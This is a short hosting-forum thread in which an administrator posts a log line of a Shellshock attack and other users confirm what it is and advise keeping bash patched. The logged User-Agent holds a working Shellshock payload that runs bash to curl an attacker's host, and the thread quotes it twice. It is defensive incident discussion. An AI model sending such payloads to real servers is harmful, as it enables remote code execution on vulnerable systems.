requests with bash/curl in the browser signature

sehh

Well-Known Member
Feb 11, 2006
579
5
168
Europe
I see an increase in these types of attacks, requests with a bash execution of curl, which executes a remote piece of code.

My question is, which application is vulnerable to this attack? something like a log reader, like "awstats"? There aren't many applications that read/parse/display server logs for browser signatures.

Thank you!

Code:
176.102.38.77 - - [20/Dec/2014:20:30:43 +0000] "HEAD /cgi-bin/ HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'curl http://176.102.38.77/search/e.php?h=domain.com/cgi-bin/'"
- - - Updated - - -

Ah wait, that was just a simple shellshock attack... scratch that :)

what kind of stupid admin executes bash from cgi-bin?... no wonder this bug did not affect my servers...
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,913
2,203
363
Hello :)

I am happy to see you were able to determine the source of the attack. Thank you for updating us with the outcome.
 

quizknows

Well-Known Member
Oct 20, 2009
1,008
87
78
cPanel Access Level
DataCenter Provider
I see an increase in these types of attacks, requests with a bash execution of curl, which executes a remote piece of code.

My question is, which application is vulnerable to this attack? something like a log reader, like "awstats"? There aren't many applications that read/parse/display server logs for browser signatures.

Thank you!

Code:
176.102.38.77 - - [20/Dec/2014:20:30:43 +0000] "HEAD /cgi-bin/ HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'curl http://176.102.38.77/search/e.php?h=domain.com/cgi-bin/'"
- - - Updated - - -

Ah wait, that was just a simple shellshock attack... scratch that :)

what kind of stupid admin executes bash from cgi-bin?... no wonder this bug did not affect my servers...
You'd be surprised. Before bash was updated I saw a lot of boxes get hit, including cPanel stuff. It didn't necessarily have to be a bash script for it to work. They put the shellshock exploit code in every HTTP field you can think of (referrer, user agent, url, post data, etc).

Anyway as long as your RPM updates run regularly and bash is up to date, nothing to see here. cPanel updates handle yum updates (RPM updates) for the most part anyway, so unless you're one of the fools who disables cPanel udpates entirely, you're fine.